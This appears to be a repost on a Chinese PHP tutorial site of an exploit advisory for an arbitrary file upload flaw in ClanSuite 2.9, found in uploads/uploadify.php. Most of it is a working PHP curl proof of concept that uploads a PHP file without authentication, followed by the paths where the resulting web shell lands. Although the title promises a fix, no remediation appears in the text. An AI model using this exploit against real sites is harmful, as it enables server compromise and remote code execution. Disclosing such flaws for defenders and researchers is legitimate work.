网站地图    收藏   

主页 > 后端 > 网站安全 >

ClanSuite 2.9任意文件上传漏洞及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 标题: ClanSuite 2.9 Arbitrary File Upload发现者: Adrien Thierry程序开发商http://clansuite.com/下载地址 : https://github.com/jakoch/Clansuite http://svn.gna.org/svn/clansuite/trunk/影响版......

标题: ClanSuite 2.9 Arbitrary File Upload 
 
发现者: Adrien Thierry 
 
程序开发商http://clansuite.com/ 
 
下载地址 : https://github.com/jakoch/Clansuite  http://svn.gna.org/svn/clansuite/trunk/ 
 
影响版本: 2.9 and Trunk Revision 6400 
 
缺陷地址 : uploads/uploadify.php 
 
  测试方法
 
<?php 
 
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php"; 
 
$c = curl_init("http:// www.2cto.com /uploads/uploadify.php"); // Version 2.9 
 
$c = curl_init("http:// www.2cto.com /application/uploads/uploadify.php"); // Version trunk 
 
curl_setopt($c, CURLOPT_POST, true); 
 
curl_setopt($c, CURLOPT_POSTFIELDS, 
 
array('Filedata'=>"@$u", 
 
'name'=>"info.php")); 
 
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); 
 
$e = curl_exec($c); 
 
curl_close($c); 
 
echo $e;  
 
?> 
 
  
 
shell位置:
http://www.2cto.com /uploads/temps/info.php       
 
或者 http://www.2cto.com /application/uploads/temps/info.php 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论